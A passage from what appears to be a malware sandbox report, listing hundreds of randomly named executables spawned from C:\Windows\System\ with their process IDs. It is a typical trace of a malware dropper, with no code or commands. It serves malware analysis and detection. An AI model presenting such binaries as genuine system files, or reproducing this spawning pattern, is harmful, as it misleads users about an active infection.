  2⤵
  PID:9356
- C:\Windows\System\QpTrbqI.exe
  C:\Windows\System\QpTrbqI.exe
  2⤵
  PID:6804
- C:\Windows\System\pnLsBka.exe
  C:\Windows\System\pnLsBka.exe
  2⤵
  PID:7980
- C:\Windows\System\slPetRW.exe
  C:\Windows\System\slPetRW.exe
  2⤵
  PID:2984
- C:\Windows\System\uobhByB.exe
  C:\Windows\System\uobhByB.exe
  2⤵
  PID:7464
- C:\Windows\System\EnfiovU.exe
  C:\Windows\System\EnfiovU.exe
  2⤵
  PID:3332
- C:\Windows\System\EJHmxdq.exe
  C:\Windows\System\EJHmxdq.exe
  2⤵
  PID:8008
- C:\Windows\System\BpMdOEs.exe
  C:\Windows\System\BpMdOEs.exe
  2⤵
  PID:2228
- C:\Windows\System\zIZtqZw.exe
  C:\Windows\System\zIZtqZw.exe
  2⤵
  PID:10136
- C:\Windows\System\OBEtKIb.exe
  C:\Windows\System\OBEtKIb.exe
  2⤵
  PID:9368
- C:\Windows\System\DCWTdkq.exe
  C:\Windows\System\DCWTdkq.exe
  2⤵
  PID:7516
- C:\Windows\System\jFUIJvL.exe
  C:\Windows\System\jFUIJvL.exe
  2⤵
  PID:2348
- C:\Windows\System\aupmUAU.exe
  C:\Windows\System\aupmUAU.exe
  2⤵
  PID:9612
- C:\Windows\System\QkfLnYd.exe
  C:\Windows\System\QkfLnYd.exe
  2⤵
  PID:9820
- C:\Windows\System\Pkfavia.exe
  C:\Windows\System\Pkfavia.exe
  2⤵
  PID:4332
- C:\Windows\System\IcVusqL.exe
  C:\Windows\System\IcVusqL.exe
  2⤵
  PID:7620
- C:\Windows\System\diQqHkG.exe
  C:\Windows\System\diQqHkG.exe
  2⤵
  PID:10140
- C:\Windows\System\QjpDYGm.exe
  C:\Windows\System\QjpDYGm.exe
  2⤵
  PID:5108
- C:\Windows\System\QWVtQMF.exe
  C:\Windows\System\QWVtQMF.exe
  2⤵
  PID:9680
- C:\Windows\System\BmOgLQg.exe
  C:\Windows\System\BmOgLQg.exe
  2⤵
  PID:7740
- C:\Windows\System\wuenjSQ.exe
  C:\Windows\System\wuenjSQ.exe
  2⤵
  PID:1148
- C:\Windows\System\FvMUPuj.exe
  C:\Windows\System\FvMUPuj.exe
  2⤵
  PID:2420
- C:\Windows\System\BqavSrC.exe
  C:\Windows\System\BqavSrC.exe
  2⤵
  PID:6836
- C:\Windows\System\HgqCYVd.exe
  C:\Windows\System\HgqCYVd.exe
  2⤵
  PID:9296
- C:\Windows\System\azANMip.exe
  C:\Windows\System\azANMip.exe
  2⤵
  PID:10376
- C:\Windows\System\zlFCSgM.exe
  C:\Windows\System\zlFCSgM.exe
  2⤵
  PID:10444
- C:\Windows\System\YWWbWwt.exe
  C:\Windows\System\YWWbWwt.exe
  2⤵
  PID:10084
- C:\Windows\System\MHyzCCo.exe
  C:\Windows\System\MHyzCCo.exe
  2⤵
  PID:8144
- C:\Windows\System\VkMyWEk.exe
  C:\Windows\System\VkMyWEk.exe
  2⤵
  PID:7488
- C:\Windows\System\lxZnqhL.exe
  C:\Windows\System\lxZnqhL.exe
  2⤵
  PID:7732
- C:\Windows\System\ThiMmww.exe
  C:\Windows\System\ThiMmww.exe
  2⤵
  PID:10592
- C:\Windows\System\vKjUrVu.exe
  C:\Windows\System\vKjUrVu.exe
  2⤵
  PID:10620
- C:\Windows\System\JqMjwpk.exe
  C:\Windows\System\JqMjwpk.exe
  2⤵
  PID:10656
- C:\Windows\System\Zvrvdqg.exe
  C:\Windows\System\Zvrvdqg.exe
  2⤵
  PID:12300
- C:\Windows\System\IZwGWhE.exe
  C:\Windows\System\IZwGWhE.exe
  2⤵
  PID:12328
- C:\Windows\System\cOBtjKP.exe
  C:\Windows\System\cOBtjKP.exe
  2⤵
  PID:12356
- C:\Windows\System\bkfuOXZ.exe
  C:\Windows\System\bkfuOXZ.exe
  2⤵
  PID:12384
- C:\Windows\System\elXzxuC.exe
  C:\Windows\System\elXzxuC.exe
  2⤵
  PID:12412
- C:\Windows\System\OFWOlpI.exe
  C:\Windows\System\OFWOlpI.exe
  2⤵
  PID:12428
- C:\Windows\System\nNdCvuH.exe
  C:\Windows\System\nNdCvuH.exe
  2⤵
  PID:12444
- C:\Windows\System\yYcoeeZ.exe
  C:\Windows\System\yYcoeeZ.exe
  2⤵
  PID:12480
- C:\Windows\System\onePtYC.exe
  C:\Windows\System\onePtYC.exe
  2⤵
  PID:12528
- C:\Windows\System\JQghEkT.exe
  C:\Windows\System\JQghEkT.exe
  2⤵
  PID:12552
- C:\Windows\System\jstnOwu.exe
  C:\Windows\System\jstnOwu.exe
  2⤵
  PID:12572
- C:\Windows\System\BRJebhB.exe
  C:\Windows\System\BRJebhB.exe
  2⤵
  PID:12596
- C:\Windows\System\LJbruLy.exe
  C:\Windows\System\LJbruLy.exe
  2⤵
  PID:12624
- C:\Windows\System\cvgOQPp.exe
  C:\Windows\System\cvgOQPp.exe
  2⤵
  PID:12660
- C:\Windows\System\vdgORwq.exe
  C:\Windows\System\vdgORwq.exe
  2⤵
  PID:12692
- C:\Windows\System\wdqjRKl.exe
  C:\Windows\System\wdqjRKl.exe
  2⤵
  PID:12720
- C:\Windows\System\pTwuuuj.exe
  C:\Windows\System\pTwuuuj.exe
  2⤵
  PID:12744
- C:\Windows\System\UkerVjJ.exe
  C:\Windows\System\UkerVjJ.exe
  2⤵
  PID:12788
- C:\Windows\System\lGKRKwV.exe
  C:\Windows\System\lGKRKwV.exe
  2⤵
  PID:12804
- C:\Windows\System\fzHGdXz.exe
  C:\Windows\System\fzHGdXz.exe
  2⤵
  PID:12824
- C:\Windows\System\jwMnTjc.exe
  C:\Windows\System\jwMnTjc.exe
  2⤵
  PID:12848
- C:\Windows\System\BZsRwFp.exe
  C:\Windows\System\BZsRwFp.exe
  2⤵
  PID:12888
- C:\Windows\System\dyZyJsK.exe
  C:\Windows\System\dyZyJsK.exe
  2⤵
  PID:12928
- C:\Windows\System\hnFcMry.exe
  C:\Windows\System\hnFcMry.exe
  2⤵
  PID:12948
- C:\Windows\System\xUXlhcB.exe
  C:\Windows\System\xUXlhcB.exe
  2⤵
  PID:12976
- C:\Windows\System\jIUqOMz.exe
  C:\Windows\System\jIUqOMz.exe
  2⤵
  PID:13000
- C:\Windows\System\MvwzfXS.exe
  C:\Windows\System\MvwzfXS.exe
  2⤵
  PID:13032
- C:\Windows\System\HZEKASH.exe
  C:\Windows\System\HZEKASH.exe
  2⤵
  PID:13072
- C:\Windows\System\KZkSsih.exe
  C:\Windows\System\KZkSsih.exe
  2⤵
  PID:13100
- C:\Windows\System\kGlJOKW.exe
  C:\Windows\System\kGlJOKW.exe
  2⤵
  PID:13128
- C:\Windows\System\GDCTlcf.exe
  C:\Windows\System\GDCTlcf.exe
  2⤵
  PID:13160
- C:\Windows\System\gpAyDST.exe
  C:\Windows\System\gpAyDST.exe
  2⤵
  PID:13196
- C:\Windows\System\SaWFDwr.exe
  C:\Windows\System\SaWFDwr.exe
  2⤵
  PID:13212
- C:\Windows\System\wtsHbde.exe
  C:\Windows\System\wtsHbde.exe
  2⤵
  PID:13240
- C:\Windows\System\bhegJIv.exe
  C:\Windows\System\bhegJIv.exe
  2⤵
  PID:13280
- C:\Windows\System\wjVVzaL.exe
  C:\Windows\System\wjVVzaL.exe
  2⤵
  PID:13296
- C:\Windows\System\kdRZquz.exe
  C:\Windows\System\kdRZquz.exe
  2⤵
  PID:12312
- C:\Windows\System\vRSJDMH.exe
  C:\Windows\System\vRSJDMH.exe
  2⤵
  PID:10768
- C:\Windows\System\UMyXWtI.exe
  C:\Windows\System\UMyXWtI.exe
  2⤵
  PID:10788
- C:\Windows\System\FacFrzL.exe
  C:\Windows\System\FacFrzL.exe
  2⤵
  PID:10860
- C:\Windows\System\vMgEyUO.exe
  C:\Windows\System\vMgEyUO.exe
  2⤵
  PID:12512
- C:\Windows\System\jlIzTWn.exe
  C:\Windows\System\jlIzTWn.exe
  2⤵
  PID:12588
- C:\Windows\System\enHNukT.exe
  C:\Windows\System\enHNukT.exe
  2⤵
  PID:12620
- C:\Windows\System\ARJiOUO.exe
  C:\Windows\System\ARJiOUO.exe
  2⤵
  PID:12676
- C:\Windows\System\mtvhnAU.exe
  C:\Windows\System\mtvhnAU.exe
  2⤵
  PID:8292
- C:\Windows\System\TNvwmFV.exe
  C:\Windows\System\TNvwmFV.exe
  2⤵
  PID:12784
- C:\Windows\System\SnfTbqG.exe
  C:\Windows\System\SnfTbqG.exe
  2⤵
  PID:12812
- C:\Windows\System\MYAudyx.exe
  C:\Windows\System\MYAudyx.exe
  2⤵
  PID:8428
- C:\Windows\System\ghMdCLq.exe
  C:\Windows\System\ghMdCLq.exe
  2⤵
  PID:12908
- C:\Windows\System\WbAyYbL.exe
  C:\Windows\System\WbAyYbL.exe
  2⤵
  PID:12992
- C:\Windows\System\qKnEGCn.exe
  C:\Windows\System\qKnEGCn.exe
  2⤵
  PID:13056
- C:\Windows\System\iBUGRZi.exe
  C:\Windows\System\iBUGRZi.exe
  2⤵
  PID:13120
- C:\Windows\System\uUpYGCm.exe
  C:\Windows\System\uUpYGCm.exe
  2⤵
  PID:13176
- C:\Windows\System\pKaUCJY.exe
  C:\Windows\System\pKaUCJY.exe
  2⤵
  PID:13252
- C:\Windows\System\PsIMFFq.exe
  C:\Windows\System\PsIMFFq.exe
  2⤵
  PID:13288
- C:\Windows\System\mRrazzS.exe
  C:\Windows\System\mRrazzS.exe
  2⤵
  PID:8960
- C:\Windows\System\afTtsFU.exe
  C:\Windows\System\afTtsFU.exe
  2⤵
  PID:12440
- C:\Windows\System\TImgDnz.exe
  C:\Windows\System\TImgDnz.exe
  2⤵
  PID:11080
- C:\Windows\System\oFmHxJd.exe
  C:\Windows\System\oFmHxJd.exe
  2⤵
  PID:12500
- C:\Windows\System\Lgwydwr.exe
  C:\Windows\System\Lgwydwr.exe
  2⤵
  PID:12652
- C:\Windows\System\RaBPwTm.exe
  C:\Windows\System\RaBPwTm.exe
  2⤵
  PID:8328
- C:\Windows\System\QxSeyBz.exe
  C:\Windows\System\QxSeyBz.exe
  2⤵
  PID:12896
- C:\Windows\System\xwoXmIk.exe
  C:\Windows\System\xwoXmIk.exe
  2⤵
  PID:12940
- C:\Windows\System\DlqSmeh.exe
  C:\Windows\System\DlqSmeh.exe
  2⤵
  PID:3728
- C:\Windows\System\XNomCpD.exe
  C:\Windows\System\XNomCpD.exe
  2⤵
  PID:13124
- C:\Windows\System\kgDiUMX.exe
  C:\Windows\System\kgDiUMX.exe
  2⤵
  PID:13192
- C:\Windows\System\tdeHzJb.exe
  C:\Windows\System\tdeHzJb.exe
  2⤵
  PID:10736
- C:\Windows\System\zxKqzWs.exe
  C:\Windows\System\zxKqzWs.exe
  2⤵
  PID:8936
- C:\Windows\System\BXqKHVC.exe
  C:\Windows\System\BXqKHVC.exe
  2⤵
  PID:8436
- C:\Windows\System\SqRbgzB.exe
  C:\Windows\System\SqRbgzB.exe
  2⤵
  PID:12704
- C:\Windows\System\qUlRjsD.exe
  C:\Windows\System\qUlRjsD.exe
  2⤵
  PID:8432
- C:\Windows\System\dITGFbV.exe
  C:\Windows\System\dITGFbV.exe
  2⤵
  PID:8128
- C:\Windows\System\LZCdgrK.exe
  C:\Windows\System\LZCdgrK.exe
  2⤵
  PID:972
- C:\Windows\System\LeDwdGp.exe
  C:\Windows\System\LeDwdGp.exe
  2⤵
  PID:12708
- C:\Windows\System\nwrrxTK.exe
  C:\Windows\System\nwrrxTK.exe
  2⤵
  PID:10980
- C:\Windows\System\qNfQRPb.exe
  C:\Windows\System\qNfQRPb.exe
  2⤵
  PID:9016
- C:\Windows\System\uvuTsNB.exe
  C:\Windows\System\uvuTsNB.exe
  2⤵
  PID:8612
- C:\Windows\System\bHeHrrf.exe
  C:\Windows\System\bHeHrrf.exe
  2⤵
  PID:12472
- C:\Windows\System\CuOeeHa.exe
  C:\Windows\System\CuOeeHa.exe
  2⤵
  PID:9152
- C:\Windows\System\eTbvXYJ.exe
  C:\Windows\System\eTbvXYJ.exe
  2⤵
  PID:11260
- C:\Windows\System\QuOEttv.exe
  C:\Windows\System\QuOEttv.exe
  2⤵
  PID:8904
- C:\Windows\System\eSPBKvj.exe
  C:\Windows\System\eSPBKvj.exe
  2⤵
  PID:9360
- C:\Windows\System\VeIqRCX.exe
  C:\Windows\System\VeIqRCX.exe
  2⤵
  PID:10712
- C:\Windows\System\KlpEmOS.exe
  C:\Windows\System\KlpEmOS.exe
  2⤵
  PID:11008
- C:\Windows\System\DxHWCDh.exe
  C:\Windows\System\DxHWCDh.exe
  2⤵
  PID:3840
- C:\Windows\System\qSnYRdL.exe
  C:\Windows\System\qSnYRdL.exe
  2⤵
  PID:1392
- C:\Windows\System\xyJkriG.exe
  C:\Windows\System\xyJkriG.exe
  2⤵
  PID:11068
- C:\Windows\System\BvEckur.exe
  C:\Windows\System\BvEckur.exe
  2⤵
  PID:8712
- C:\Windows\System\yccsvDf.exe
  C:\Windows\System\yccsvDf.exe
  2⤵
  PID:11224
- C:\Windows\System\zZgader.exe
  C:\Windows\System\zZgader.exe
  2⤵
  PID:12580
- C:\Windows\System\lWAQIpv.exe
  C:\Windows\System\lWAQIpv.exe
  2⤵
  PID:13332
- C:\Windows\System\RyyHYnB.exe
  C:\Windows\System\RyyHYnB.exe
  2⤵
  PID:13364
- C:\Windows\System\CjnwrfB.exe
  C:\Windows\System\CjnwrfB.exe
  2⤵
  PID:13396
- C:\Windows\System\jtRXhMI.exe
  C:\Windows\System\jtRXhMI.exe
  2⤵
  PID:13412
- C:\Windows\System\ypctLeP.exe
  C:\Windows\System\ypctLeP.exe
  2⤵
  PID:13452
- C:\Windows\System\BfjFcze.exe
  C:\Windows\System\BfjFcze.exe
  2⤵
  PID:13468
- C:\Windows\System\kUKBdxW.exe
  C:\Windows\System\kUKBdxW.exe
  2⤵
  PID:13500
- C:\Windows\System\LYVItdI.exe
  C:\Windows\System\LYVItdI.exe
  2⤵
  PID:13532
- C:\Windows\System\zTguFvh.exe
  C:\Windows\System\zTguFvh.exe
  2⤵
  PID:13564
- C:\Windows\System\ZPVwGFs.exe
  C:\Windows\System\ZPVwGFs.exe
  2⤵
  PID:13588
- C:\Windows\System\CTFHzVJ.exe
  C:\Windows\System\CTFHzVJ.exe
  2⤵
  PID:13620
- C:\Windows\System\MwoAoNd.exe
  C:\Windows\System\MwoAoNd.exe
  2⤵
  PID:13648
- C:\Windows\System\SzpzrAz.exe
  C:\Windows\System\SzpzrAz.exe
  2⤵
  PID:13676
- C:\Windows\System\FANELvL.exe
  C:\Windows\System\FANELvL.exe
  2⤵
  PID:13700
- C:\Windows\System\sMkBveX.exe
  C:\Windows\System\sMkBveX.exe
  2⤵
  PID:13736
- C:\Windows\System\zzwCXDK.exe
  C:\Windows\System\zzwCXDK.exe
  2⤵
  PID:13756
- C:\Windows\System\fthLLKP.exe
  C:\Windows\System\fthLLKP.exe
  2⤵
  PID:13784
- C:\Windows\System\JmBsZIv.exe
  C:\Windows\System\JmBsZIv.exe
  2⤵
  PID:13832
- C:\Windows\System\mhhfeRC.exe
  C:\Windows\System\mhhfeRC.exe
  2⤵
  PID:13856
- C:\Windows\System\gZhldSm.exe
  C:\Windows\System\gZhldSm.exe
  2⤵
  PID:13872
- C:\Windows\System\fSWmrJH.exe
  C:\Windows\System\fSWmrJH.exe
  2⤵
  PID:13904
- C:\Windows\System\NCTqPgY.exe
  C:\Windows\System\NCTqPgY.exe
  2⤵
  PID:13928
- C:\Windows\System\GUEQWgp.exe
  C:\Windows\System\GUEQWgp.exe
  2⤵
  PID:13952
- C:\Windows\System\AajYTEB.exe
  C:\Windows\System\AajYTEB.exe
  2⤵
  PID:14000
- C:\Windows\System\JpbFJRM.exe
  C:\Windows\System\JpbFJRM.exe
  2⤵
  PID:14020
- C:\Windows\System\clOvwGv.exe
  C:\Windows\System\clOvwGv.exe
  2⤵
  PID:14060
- C:\Windows\System\VlNnYPl.exe
  C:\Windows\System\VlNnYPl.exe
  2⤵
  PID:14088
- C:\Windows\System\ndMllfW.exe
  C:\Windows\System\ndMllfW.exe
  2⤵
  PID:14112
- C:\Windows\System\uxeTkly.exe
  C:\Windows\System\uxeTkly.exe
  2⤵
  PID:14148
- C:\Windows\System\zyeoNpe.exe
  C:\Windows\System\zyeoNpe.exe
  2⤵
  PID:14176
- C:\Windows\System\NtADMcE.exe
  C:\Windows\System\NtADMcE.exe
  2⤵
  PID:14196
- C:\Windows\System\wPrnVFw.exe
  C:\Windows\System\wPrnVFw.exe
  2⤵
  PID:14224
- C:\Windows\System\OOdHMFS.exe
  C:\Windows\System\OOdHMFS.exe
  2⤵
  PID:14244
- C:\Windows\System\daBcJLd.exe
  C:\Windows\System\daBcJLd.exe
  2⤵
  PID:14288
- C:\Windows\System\CmbTqKy.exe
  C:\Windows\System\CmbTqKy.exe
  2⤵
  PID:14320
- C:\Windows\System\qUsZVbE.exe
  C:\Windows\System\qUsZVbE.exe
  2⤵
  PID:10128
- C:\Windows\System\aceFTpx.exe
  C:\Windows\System\aceFTpx.exe
  2⤵
  PID:13384
- C:\Windows\System\GDvBacC.exe
  C:\Windows\System\GDvBacC.exe
  2⤵
  PID:13424
- C:\Windows\System\VLzWRYo.exe
  C:\Windows\System\VLzWRYo.exe
  2⤵
  PID:13480
- C:\Windows\System\HkCZsBB.exe
  C:\Windows\System\HkCZsBB.exe
  2⤵
  PID:9312
- C:\Windows\System\ADpEDKj.exe
  C:\Windows\System\ADpEDKj.exe
  2⤵
  PID:13604
- C:\Windows\System\OfazJVX.exe
  C:\Windows\System\OfazJVX.exe
  2⤵
  PID:13644
- C:\Windows\System\uFjJAFM.exe
  C:\Windows\System\uFjJAFM.exe
  2⤵
  PID:13692
- C:\Windows\System\DWyIDqf.exe
  C:\Windows\System\DWyIDqf.exe
  2⤵
  PID:13744
- C:\Windows\System\EcCudpd.exe
  C:\Windows\System\EcCudpd.exe
  2⤵
  PID:13804
- C:\Windows\System\drMLHpt.exe
  C:\Windows\System\drMLHpt.exe
  2⤵
  PID:13848
- C:\Windows\System\mMfBIFZ.exe
  C:\Windows\System\mMfBIFZ.exe
  2⤵
  PID:9568
- C:\Windows\System\JaLpoqC.exe
  C:\Windows\System\JaLpoqC.exe
  2⤵
  PID:10200
- C:\Windows\System\VONCsbj.exe
  C:\Windows\System\VONCsbj.exe
  2⤵
  PID:13968
- C:\Windows\System\LWKvlTn.exe
  C:\Windows\System\LWKvlTn.exe
  2⤵
  PID:14036
- C:\Windows\System\rdjnilc.exe
  C:\Windows\System\rdjnilc.exe
  2⤵
  PID:10252
- C:\Windows\System\PPplBsq.exe
  C:\Windows\System\PPplBsq.exe
  2⤵
  PID:14124
- C:\Windows\System\tIdNNeB.exe
  C:\Windows\System\tIdNNeB.exe
  2⤵
  PID:14172
- C:\Windows\System\CQEnpDD.exe
  C:\Windows\System\CQEnpDD.exe
  2⤵
  PID:14164
- C:\Windows\System\zhckFIZ.exe
  C:\Windows\System\zhckFIZ.exe
  2⤵
  PID:14236
- C:\Windows\System\shEkFqw.exe
  C:\Windows\System\shEkFqw.exe
  2⤵
  PID:10516
- C:\Windows\System\nJpXLCS.exe
  C:\Windows\System\nJpXLCS.exe
  2⤵
  PID:13316
- C:\Windows\System\CrwMAfY.exe
  C:\Windows\System\CrwMAfY.exe
  2⤵
  PID:13440
- C:\Windows\System\wNEOwUa.exe
  C:\Windows\System\wNEOwUa.exe
  2⤵
  PID:3704
- C:\Windows\System\peRTyuO.exe
  C:\Windows\System\peRTyuO.exe
  2⤵
  PID:13608
- C:\Windows\System\UgqRWrh.exe
  C:\Windows\System\UgqRWrh.exe
  2⤵
  PID:12148
- C:\Windows\System\bCZnwrA.exe
  C:\Windows\System\bCZnwrA.exe
  2⤵
  PID:13728
- C:\Windows\System\bNvcFWf.exe
  C:\Windows\System\bNvcFWf.exe
  2⤵
  PID:10112
- C:\Windows\System\ubhAaDJ.exe
  C:\Windows\System\ubhAaDJ.exe
  2⤵
  PID:9472
- C:\Windows\System\AdWSYjJ.exe
  C:\Windows\System\AdWSYjJ.exe
  2⤵
  PID:14012
- C:\Windows\System\PFlOpky.exe
  C:\Windows\System\PFlOpky.exe
  2⤵
  PID:3784
- C:\Windows\System\MhheLAt.exe
  C:\Windows\System\MhheLAt.exe
  2⤵
  PID:10348
- C:\Windows\System\UUteFmf.exe
  C:\Windows\System\UUteFmf.exe
  2⤵
  PID:6108
- C:\Windows\System\VTiqqXu.exe
  C:\Windows\System\VTiqqXu.exe
  2⤵
  PID:14296
- C:\Windows\System\PJhJlNN.exe
  C:\Windows\System\PJhJlNN.exe
  2⤵
  PID:11352
- C:\Windows\System\arSzhxz.exe
  C:\Windows\System\arSzhxz.exe
  2⤵
  PID:11356
- C:\Windows\System\WwrEykO.exe
  C:\Windows\System\WwrEykO.exe
  2⤵
  PID:9600
- C:\Windows\System\JFpTFsw.exe
  C:\Windows\System\JFpTFsw.exe
  2⤵
  PID:10732
- C:\Windows\System\GrpULPU.exe
  C:\Windows\System\GrpULPU.exe
  2⤵
  PID:14008
- C:\Windows\System\mcEGYSB.exe
  C:\Windows\System\mcEGYSB.exe
  2⤵
  PID:10972
- C:\Windows\System\WqNDViX.exe
  C:\Windows\System\WqNDViX.exe
  2⤵
  PID:11276
- C:\Windows\System\wUIROnB.exe
  C:\Windows\System\wUIROnB.exe
  2⤵
  PID:11948
- C:\Windows\System\iVKIrkL.exe
  C:\Windows\System\iVKIrkL.exe
  2⤵
  PID:10704
- C:\Windows\System\JFqhbwU.exe
  C:\Windows\System\JFqhbwU.exe
  2⤵
  PID:14108
- C:\Windows\System\KhMWAvw.exe
  C:\Windows\System\KhMWAvw.exe
  2⤵
  PID:12152
- C:\Windows\System\tFeRHoI.exe
  C:\Windows\System\tFeRHoI.exe
  2⤵
  PID:11148
- C:\Windows\System\ubTFRie.exe
  C:\Windows\System\ubTFRie.exe
  2⤵
  PID:14344
- C:\Windows\System\cgpRiTu.exe
  C:\Windows\System\cgpRiTu.exe
  2⤵
  PID:14376
- C:\Windows\System\nQKunoH.exe
  C:\Windows\System\nQKunoH.exe
  2⤵
  PID:14412
- C:\Windows\System\crZztSr.exe
  C:\Windows\System\crZztSr.exe
  2⤵
  PID:14440
- C:\Windows\System\kuRWFcT.exe
  C:\Windows\System\kuRWFcT.exe
  2⤵
  PID:14480
- C:\Windows\System\lFVxvUz.exe
  C:\Windows\System\lFVxvUz.exe
  2⤵
  PID:14504
- C:\Windows\System\udPtPRA.exe
  C:\Windows\System\udPtPRA.exe
  2⤵
  PID:14532
- C:\Windows\System\FkxSQxV.exe
  C:\Windows\System\FkxSQxV.exe
  2⤵
  PID:14576
- C:\Windows\System\NuRmRfH.exe
  C:\Windows\System\NuRmRfH.exe
  2⤵
  PID:14608
- C:\Windows\System\wNwbeZs.exe
  C:\Windows\System\wNwbeZs.exe
  2⤵
  PID:14636
- C:\Windows\System\nadqcDS.exe
  C:\Windows\System\nadqcDS.exe
  2⤵
  PID:14664
- C:\Windows\System\ZHBlwbs.exe
  C:\Windows\System\ZHBlwbs.exe
  2⤵
  PID:14692
- C:\Windows\System\FHfRPkI.exe
  C:\Windows\System\FHfRPkI.exe
  2⤵
  PID:14712
- C:\Windows\System\gBDbiLN.exe
  C:\Windows\System\gBDbiLN.exe
  2⤵
  PID:14748
- C:\Windows\System\mTwsdSH.exe
  C:\Windows\System\mTwsdSH.exe
  2⤵
  PID:14776
- C:\Windows\System\mqWWiaB.exe
  C:\Windows\System\mqWWiaB.exe
  2⤵
  PID:14804
- C:\Windows\System\jZzcjFt.exe
  C:\Windows\System\jZzcjFt.exe
  2⤵
  PID:14824
- C:\Windows\System\VsgvraC.exe
  C:\Windows\System\VsgvraC.exe
  2⤵
  PID:14860
- C:\Windows\System\dtUHAah.exe
  C:\Windows\System\dtUHAah.exe
  2⤵
  PID:14896
- C:\Windows\System\jRRJReZ.exe
  C:\Windows\System\jRRJReZ.exe
  2⤵
  PID:14924
- C:\Windows\System\rcWwjLA.exe
  C:\Windows\System\rcWwjLA.exe
  2⤵
  PID:14952
- C:\Windows\System\izhxCFx.exe
  C:\Windows\System\izhxCFx.exe
  2⤵
  PID:15028
- C:\Windows\System\tJGlBmm.exe
  C:\Windows\System\tJGlBmm.exe
  2⤵
  PID:15044
- C:\Windows\System\VsHviXE.exe
  C:\Windows\System\VsHviXE.exe
  2⤵
  PID:15064
- C:\Windows\System\ZDOjYrk.exe
  C:\Windows\System\ZDOjYrk.exe
  2⤵
  PID:15092
- C:\Windows\System\FxAYdjF.exe
  C:\Windows\System\FxAYdjF.exe
  2⤵
  PID:15132
- C:\Windows\System\iGtlOOd.exe
  C:\Windows\System\iGtlOOd.exe
  2⤵
  PID:15160
- C:\Windows\System\WmzVBVO.exe
  C:\Windows\System\WmzVBVO.exe
  2⤵
  PID:15184
- C:\Windows\System\XVbJxEF.exe
  C:\Windows\System\XVbJxEF.exe
  2⤵
  PID:15216
- C:\Windows\System\ZoZYWTb.exe
  C:\Windows\System\ZoZYWTb.exe
  2⤵
  PID:15244
- C:\Windows\System\qfTMMCJ.exe
  C:\Windows\System\qfTMMCJ.exe
  2⤵
  PID:15272
- C:\Windows\System\cYgyKlU.exe
  C:\Windows\System\cYgyKlU.exe
  2⤵
  PID:15300
- C:\Windows\System\EJKxSXZ.exe
  C:\Windows\System\EJKxSXZ.exe
  2⤵
  PID:15328
- C:\Windows\System\xlnDeCX.exe
  C:\Windows\System\xlnDeCX.exe
  2⤵
  PID:15356
- C:\Windows\System\ZRkmXuJ.exe
  C:\Windows\System\ZRkmXuJ.exe
  2⤵
  PID:11236
- C:\Windows\System\wPBlKvm.exe
  C:\Windows\System\wPBlKvm.exe
  2⤵
  PID:14408
- C:\Windows\System\DQWbOHB.exe
  C:\Windows\System\DQWbOHB.exe
  2⤵
  PID:13948
- C:\Windows\System\FerrzpS.exe
  C:\Windows\System\FerrzpS.exe
  2⤵
  PID:14544
- C:\Windows\System\RBbiiZT.exe
  C:\Windows\System\RBbiiZT.exe
  2⤵
  PID:10596
- C:\Windows\System\OrlkuaN.exe
  C:\Windows\System\OrlkuaN.exe
  2⤵
  PID:14624
- C:\Windows\System\lnTLksx.exe
  C:\Windows\System\lnTLksx.exe
  2⤵
  PID:14684
- C:\Windows\System\rIcmWTg.exe
  C:\Windows\System\rIcmWTg.exe
  2⤵
  PID:14740
- C:\Windows\System\RydGTxZ.exe
  C:\Windows\System\RydGTxZ.exe
  2⤵
  PID:14796
- C:\Windows\System\nyQsLzS.exe
  C:\Windows\System\nyQsLzS.exe
  2⤵
  PID:6032
- C:\Windows\System\mUaDkQm.exe
  C:\Windows\System\mUaDkQm.exe
  2⤵
  PID:14856
- C:\Windows\System\LrlHupK.exe
  C:\Windows\System\LrlHupK.exe
  2⤵
  PID:11208
- C:\Windows\System\aanYhUS.exe
  C:\Windows\System\aanYhUS.exe
  2⤵
  PID:14968
- C:\Windows\System\teawQzM.exe
  C:\Windows\System\teawQzM.exe
  2⤵
  PID:5148
- C:\Windows\System\VMBLYfN.exe
  C:\Windows\System\VMBLYfN.exe
  2⤵
  PID:14464
- C:\Windows\System\QlRoGTy.exe
  C:\Windows\System\QlRoGTy.exe
  2⤵
  PID:11684
- C:\Windows\System\Oxbksqm.exe
  C:\Windows\System\Oxbksqm.exe
  2⤵
  PID:10364
- C:\Windows\System\fXVBPnD.exe
  C:\Windows\System\fXVBPnD.exe
  2⤵
  PID:11280
- C:\Windows\System\PxlQNlZ.exe
  C:\Windows\System\PxlQNlZ.exe
  2⤵
  PID:11272
- C:\Windows\System\rfQveMu.exe
  C:\Windows\System\rfQveMu.exe
  2⤵
  PID:5972
- C:\Windows\System\UZhJcaO.exe
  C:\Windows\System\UZhJcaO.exe
  2⤵
  PID:11488
- C:\Windows\System\pyomkuU.exe
  C:\Windows\System\pyomkuU.exe
  2⤵
  PID:11668
- C:\Windows\System\rhNvloz.exe
  C:\Windows\System\rhNvloz.exe
  2⤵
  PID:3968
- C:\Windows\System\fgqdpIF.exe
  C:\Windows\System\fgqdpIF.exe
  2⤵
  PID:11836
- C:\Windows\System\efAfWdq.exe
  C:\Windows\System\efAfWdq.exe
  2⤵
  PID:15052
- C:\Windows\System\Wqnyzdh.exe
  C:\Windows\System\Wqnyzdh.exe
  2⤵
  PID:15108
- C:\Windows\System\lZBDvyc.exe
  C:\Windows\System\lZBDvyc.exe
  2⤵
  PID:15148
- C:\Windows\System\VgweHNq.exe
  C:\Windows\System\VgweHNq.exe
  2⤵
  PID:15204
- C:\Windows\System\ZUpUDrk.exe
  C:\Windows\System\ZUpUDrk.exe
  2⤵
  PID:12008
- C:\Windows\System\xsRbPkW.exe
  C:\Windows\System\xsRbPkW.exe
  2⤵
  PID:15288
- C:\Windows\System\GeFcQvk.exe
  C:\Windows\System\GeFcQvk.exe
  2⤵
  PID:15340
- C:\Windows\System\DeYvYqN.exe
  C:\Windows\System\DeYvYqN.exe
  2⤵
  PID:14388
- C:\Windows\System\QyuItTg.exe
  C:\Windows\System\QyuItTg.exe
  2⤵
  PID:14512
- C:\Windows\System\FdheRHy.exe
  C:\Windows\System\FdheRHy.exe
  2⤵
  PID:10520
- C:\Windows\System\UtpLyAD.exe
  C:\Windows\System\UtpLyAD.exe
  2⤵
  PID:14704
- C:\Windows\System\PeOVmHL.exe
  C:\Windows\System\PeOVmHL.exe
  2⤵
  PID:14764
- C:\Windows\System\DiLEYJn.exe
  C:\Windows\System\DiLEYJn.exe
  2⤵
  PID:6420
- C:\Windows\System\zBlPyKu.exe
  C:\Windows\System\zBlPyKu.exe
  2⤵
  PID:14852
- C:\Windows\System\iVJLkIx.exe
